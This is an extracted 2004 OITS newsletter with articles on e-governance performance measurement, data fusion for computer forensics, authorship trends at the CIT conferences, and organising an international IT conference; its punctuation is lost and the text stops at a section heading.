We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

